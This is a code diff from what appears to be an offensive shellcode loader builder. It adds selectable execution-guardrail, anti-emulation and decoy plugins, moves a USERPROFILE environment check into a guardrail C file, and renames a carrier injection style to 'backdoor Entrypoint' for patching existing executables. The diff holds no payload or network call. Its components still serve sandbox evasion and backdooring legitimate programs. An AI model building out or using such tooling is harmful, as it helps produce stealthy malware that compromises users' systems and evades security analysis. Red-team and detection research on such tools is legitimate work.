+
- {% if is_64 %}
- x64: {{ is_64 }}
- {% else %}
-
x64: {{ is_64 }}
- {% endif %}
- / Dotnet: {{ is_dotnet}}
- .text: {{ code_sect_size}}
- .rdata: {{ data_sect_size}}
- (max: {{ data_sect_largest_gap_size}})
- {% if not has_rodata_section %}
-
No .rdata section
- {% endif %}
+
EXE Info:
+
+ -
+ {% if is_64 %}
+ x64: {{ is_64 }}
+ {% else %}
+ x64: {{ is_64 }}
+ {% endif %}
+
+
+ -
+ Dotnet: {{ is_dotnet}}
+
+
+ -
+ .text: {{ code_sect_size}}
+
+
+ -
+ .rdata: {{ data_sect_size}}
+ (max: {{ data_sect_largest_gap_size}})
+
+
+ {% if not has_rodata_section %}
+ -
+ No .rdata section
+
+ {% endif %}
+
{% if unresolved_dlls|length > 0 %}
@@ -108,37 +141,59 @@
{% endfor %}
{% endif %}
+
-
-
+
+
-
+
-
-
+
-
-
-
+
+
diff --git a/app/views_project.py b/app/views_project.py
index 5cc6989..53d2fe7 100644
--- a/app/views_project.py
+++ b/app/views_project.py
@@ -102,6 +102,10 @@ def project(name):
carrier_invoke_styles = [(color.name, color.value) for color in CarrierInvokeStyle]
payload_locations = [(color.name, color.value) for color in PayloadLocation]
+ guardrail_styles = list_files(PATH_GUARDRAILS)
+ antiemulation_styles = list_files(PATH_ANTIEMULATION)
+ decoy_styles = list_files(PATH_DECOY)
+
return render_template('project.html',
project_name = name,
project=project,
@@ -128,6 +132,10 @@ def project(name):
has_remote=has_remote,
fix_missing_iat=project.settings.fix_missing_iat,
+
+ guardrailstyles = guardrail_styles,
+ antiemulationstyles = antiemulation_styles,
+ decoystyles = decoy_styles,
)
@@ -145,6 +153,16 @@ def list_files_and_sizes(directory, prepend=""):
return files_and_sizes
+def list_files(directory, prepend="") -> List[str]:
+ files = []
+ for filename in os.listdir(directory):
+ filepath = os.path.join(directory, filename)
+ if os.path.isfile(filepath):
+ filename = filename.replace(".c", "")
+ files.append(filename)
+ return files
+
+
@views_project.route("/project_add", methods=['POST', 'GET'])
def add_project():
if request.method == 'POST':
@@ -177,8 +195,16 @@ def add_project():
settings.fix_missing_iat = True if request.form.get('fix_missing_iat') != None else False
- carrier_name = request.form['carrier_name']
- settings.carrier_name = carrier_name
+ settings.carrier_name = request.form['carrier_name']
+
+ settings.plugin_antiemulation = request.form['antiemulation']
+ settings.plugin_decoy = request.form['decoy']
+ settings.plugin_guardrail = request.form['guardrail']
+ logger.info("E: {} D: {} G: {}".format(
+ settings.plugin_antiemulation,
+ settings.plugin_decoy,
+ settings.plugin_guardrail
+ ))
carrier_invoke_style = request.form['carrier_invoke_style']
settings.carrier_invoke_style = CarrierInvokeStyle[carrier_invoke_style]
diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c
index 5b95a5b..04dccd4 100644
--- a/data/source/carrier/alloc_rw_rx/template.c
+++ b/data/source/carrier/alloc_rw_rx/template.c
@@ -20,18 +20,6 @@ char *supermega_payload;
int main()
{
- // Execution Guardrail: Env Check
- wchar_t envVarName[] = L"USERPROFILE";
- wchar_t tocheck[] = L"C:\\Users\\";
- WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
- DWORD result = GetEnvironmentVariableW(envVarName, buffer, 1024);
- if (result == 0) {
- return 6;
- }
- if (mystrcmp(buffer, tocheck) != 0) {
- return 6;
- }
-
// Depends on plugin_antiemulation
antiemulation();
diff --git a/data/source/guardrails/env.c b/data/source/guardrails/env.c
new file mode 100644
index 0000000..17741f8
--- /dev/null
+++ b/data/source/guardrails/env.c
@@ -0,0 +1,11 @@
+ // Execution Guardrail: Env Check
+ wchar_t envVarName[] = L"USERPROFILE";
+ wchar_t tocheck[] = L"C:\\Users\\";
+ WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
+ DWORD result = GetEnvironmentVariableW(envVarName, buffer, 1024);
+ if (result == 0) {
+ return 6;
+ }
+ if (mystrcmp(buffer, tocheck) != 0) {
+ return 6;
+ }
\ No newline at end of file
diff --git a/data/source/guardrails/none.c b/data/source/guardrails/none.c
new file mode 100644
index 0000000..e69de29
diff --git a/model/defs.py b/model/defs.py
index f8ee147..daba564 100644
--- a/model/defs.py
+++ b/model/defs.py
@@ -17,6 +17,7 @@ PATH_PAYLOAD = "data/source/payload/"
PATH_DECODER = "data/source/decoder/"
PATH_ANTIEMULATION = "data/source/antiemulation/"
PATH_DECOY = "data/source/decoy/"
+PATH_GUARDRAILS = "data/source/guardrails/"
PATH_WEB_PROJECT = "projects/"
@@ -30,13 +31,13 @@ class DecoderStyle(Enum):
class PayloadLocation(Enum):
- CODE = "code"
- DATA = "data"
+ CODE = ".text"
+ DATA = ".rdata"
class CarrierInvokeStyle(Enum):
ChangeEntryPoint = "change EntryPoint"
- BackdoorCallInstr = "hijack Main"
+ BackdoorCallInstr = "backdoor Entrypoint"
class FunctionInvokeStyle(Enum):
diff --git a/model/settings.py b/model/settings.py
index 35817b9..2dc8fbd 100644
--- a/model/settings.py
+++ b/model/settings.py
@@ -16,6 +16,7 @@ class Settings():
self.plugin_antiemulation = "none"
self.plugin_decoy = "none"
+ self.plugin_guardrail = "none"
self.dllfunc: str = "" # For DLL injection
diff --git a/phases/templater.py b/phases/templater.py
index e23cb03..44c0185 100644
--- a/phases/templater.py
+++ b/phases/templater.py
@@ -27,7 +27,13 @@ def create_c_from_template(settings: Settings, payload_len: int):
PATH_DECODER, settings.main_c_path))
plugin_decoder = ""
- # Decoder
+ # Plugin: Execution Guardrails
+ filepath_guardrails = PATH_GUARDRAILS + "{}.c".format(
+ settings.plugin_guardrail)
+ with open(filepath_guardrails, "r", encoding='utf-8') as file:
+ plugin_guardrails = file.read()
+
+ # Plugin: Decoder
filepath_decoder = PATH_DECODER + "{}.c".format(
settings.decoder_style.value)
with open(filepath_decoder, "r", encoding='utf-8') as file:
@@ -48,7 +54,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
filepath_decoy = PATH_DECOY + "{}.c".format(
settings.plugin_decoy)
with open(filepath_decoy, "r", encoding='utf-8') as file:
- plugin_decoy = file.read()
+ plugin_decoy = file.read()
# Choose template
dirpath = PATH_CARRIER + settings.carrier_name + "/template.c"
@@ -61,6 +67,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
'plugin_decoder': plugin_decoder,
'plugin_antiemulation': plugin_antiemualation,
'plugin_decoy': plugin_decoy,
+ 'plugin_guardrails': plugin_guardrails,
'PAYLOAD_LEN': payload_len,
})
with open(settings.main_c_path, "w", encoding='utf-8') as file: